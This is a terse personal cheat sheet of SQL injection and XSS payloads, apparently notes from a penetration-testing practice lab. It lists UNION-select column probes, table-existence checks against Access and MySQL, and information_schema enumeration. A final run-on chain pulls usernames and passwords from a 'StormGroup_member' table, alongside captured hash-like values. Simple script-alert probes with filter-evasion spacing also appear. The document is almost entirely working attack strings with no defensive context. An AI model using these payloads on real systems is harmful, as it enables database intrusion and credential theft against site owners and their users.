sql xss

UNION all SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 FROM MSysAccessObjects

and 0 <= (select COUNT(*) from [Admin])
and 0 <= (select COUNT(*) from [MSysAccessObjects])
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from MSysAccessObjects

AND exist(select name from admin)

order by 10			//6个字段

union select 1,2,3,4,5,6 from admin

and exists (select  * from admin)

and exists (select  * from product)

and exists (select * from user)

and 1=2 union select 1,2,3,4,5,6 from admin

< s Cript>alert(1)
<script> alert(1)</script>

<>< < scr 
union select 1,username,passwd,id from admin
click union select 1,2,3,4 from admin and exists(select passwd from admin) union select 1,username,passwd,id from admin union select 1,username,passwd,4 from admin and 1=2 union select 1,database(),version(),4 where table_schema=sys and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 0,1 mozhe_Discuz_StormGroup,StormGroup_member,id,name,password,status mozhe,356f589a7df439f6f744ff19bb8092c0,dsan13 285506fb25b74672e86e7f078cf95fa4,346451 mozhe566b4b5fa7baba48ca1e7ac93e7 and 1=2 union select 1,table_name,table_name,4 from information_schema.tables where table_schema=sys limit 0,1 and 1=2 union select 1,table_name,3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' limit 0,1 and 1=2 union select 1,column_name,3,4 from information_schema.columns where table_schema='mozhe_Discuz_StormGroup' and table_name=StormGroup_member limit 0,1 and 1=2 union select GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database() union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' and 1=2 union select 1,column_name,3,4 from information_schema.columns where table_schema='mozhe_Discuz_StormGroup' and table_name='StormGroup_member' limit 0,1 and 1=2 union select 1,name,password,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1

